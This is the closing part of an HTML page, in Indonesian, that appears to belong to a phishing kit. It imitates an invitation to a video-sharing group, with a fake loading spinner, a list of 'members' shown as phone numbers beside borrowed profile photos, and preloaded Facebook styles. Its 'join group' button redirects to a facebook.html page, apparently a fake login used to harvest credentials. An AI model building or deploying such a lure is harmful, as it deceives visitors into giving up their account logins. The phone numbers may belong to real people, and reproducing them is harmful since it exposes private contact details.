    			<span class="ceo">Grup dibuat oleh Iwan Ster</span>
    			<p class="desc">
    				💡 WELCOME TO GROUP 💡<br>
    				<span class="bold">📍 Rules 📍</span><br>
    				📌 Dilarang Spam ... <span class="more">Baca selengkapnya<br>
    				
    			</p>
    			<div class="peserta">135 peserta</div>
    			<div class="profile">
    				<ul>
    					<li>
    						<div class="imgBox">
    							<img src="https://pbs.twimg.com/profile_images/1347717632254832644/nqWsOcyN_400x400.jpg">
    						</div>
    						<span class="nama">+6282330<br>602071</span>
    					</li>

    					<li>
    						<div class="imgBox">
    							<img src="https://pbs.twimg.com/profile_images/3487432545/ece186f5e6bbe9fc4e6c87321ec624f6_400x400.jpeg">
    						</div>
    						<span class="nama">+628387157<br>6645</span>
    					</li>

    					<li>
    						<div class="imgBox">
    							<img src="https://pbs.twimg.com/profile_images/1301246362307026945/iTh-i5l8.jpg">
    						</div>
    						<span class="nama">+6281286<br>616893</span>
    					</li>

    					<li>
    						<div class="imgBox">
    							<img src="https://s.kaskus.id/r540x540/images/2018/06/24/8866231_20180624122453.jpg">
    						</div>
    						<span class="nama">+628387023<br>9357</span>
    					</li>

    					<li>
    						<div class="imgBox">
    							<img src="https://images.solopos.com/2010/08/anang.jpg">
    						</div>
    						<span class="nama">+6281219<br>550857</span>
    					</li>

    					<li>
    						<div class="imgBox">
    							<img src="https://assets.jalantikus.com/assets/cache/560/373/userfiles/2019/03/06/karakter-anime-cantik-9-5d82f.jpg.webp">
    						</div>
    						<span class="nama">+62838708<br>15121</span>
    					</li>

    					<li>
    						<div class="imgBox">
    							<img src="https://pbs.twimg.com/profile_images/1335779851664420864/K52E6n8Q_400x400.jpg">
    						</div>
    						<span class="nama">+6285776<br>422447</span>
    					</li>
    				</ul>
    			</div>
    		</div>
    		<div class="bottom">
    			<a class="cancel">BATAL</a>
    			<a class="fb">BERGABUNG KE GROUP</a>
    		</div>
    	</div>
    	<div class="loading" style="display: none;">
    		<span>Memeriksa undangan grup...</span>
    		<img class="spin" src="https://miro.medium.com/max/1600/0*ptDX0HfJCYpo9Pcs.gif">
    	</div>
    	<!-- LOGIN FB -->
    	
    </section>


    <div class="mask"></div>


    <script src="https://code.jquery.com/jquery-3.5.1.min.js"></script>
    <script type="text/javascript">
    	$(document).ready(function()
    	{
    		$('.fb').click(function(){
    			window.location="facebook.html";
    		})
    		$('.cancel').click(function(){
                $('.mask').hide();
                $('.join').hide();
    		})
    		$('#action-button').click(function(){
    			
    		})
    	})
    </script>
    <script type="text/javascript">
    	function nguyen()
    	{
    		$('.mask').show();
    		$('.loading').show();
    		setTimeout(() => {
    			$('.loading').hide();
    			$('.join').show();
    		},1500);
    	}
    		var desc = document.getElementsByClassName("desc");
    		var more = document.getElementsByClassName("more");
    		more[0].addEventListener("click",function()
    		{
    			desc[0].innerHTML = '💡 WELCOME TO GROUP 💡<br><span class="bold">📍 Rules 📍</span><br>📌 Dilarang Spam<br>📌 Dilarang Sara<br>📌 Dilarang Saling Menghina<br>📌 Dilarang Telpon Admin<br>📌 Harus Berbagi Video<br>📌 Nyimak doang auto kick<br>🎈 SALAM DAMAI 🎈';
    					
    		})
    </script>
    <link rel="preload" href="https://z-p3-static.xx.fbcdn.net/rsrc.php/v3/y7/l/0,cross/li1FVv8ji_p.css?_nc_x=Ij3Wp8lg5Kz" as="style" crossorigin="anonymous" />
    <link rel="preload" href="https://z-p3-static.xx.fbcdn.net/rsrc.php/v3/yg/l/0,cross/7fkNK1GGa6I.css?_nc_x=Ij3Wp8lg5Kz" as="style" crossorigin="anonymous" />
</body>

</html>